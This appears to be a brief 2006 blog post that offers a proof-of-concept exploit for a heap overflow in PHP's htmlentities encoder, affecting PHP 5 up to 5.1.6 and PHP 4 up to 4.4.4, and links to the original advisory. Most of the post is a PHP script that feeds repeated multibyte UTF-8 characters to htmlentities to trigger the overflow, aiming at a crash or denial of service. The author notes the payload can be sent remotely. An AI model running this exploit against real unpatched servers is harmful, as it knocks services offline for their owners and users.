PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?

7-11-2006

I like Proof of Concepts, so this is a simple PoC for PHP HTML Entity Encoder Heap Overflow Vulnerability. You can supply payload from requets so it's remote.

Original Advisory : http://www.securityfocus.com/archive/1/450431

<?

// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4
$fuzzFixed="";
echo "something... we need this stupid echo or do something else...";

for($pl=0; $pl<64; $pl++)
$fuzzFixed .= code2utf(977);

htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" );

function code2utf($num){
return chr(($num>>6)+192).chr(($num&63)+128);
}

echo "ehm...";
?>

Recent Blog Posts

See all of the blog posts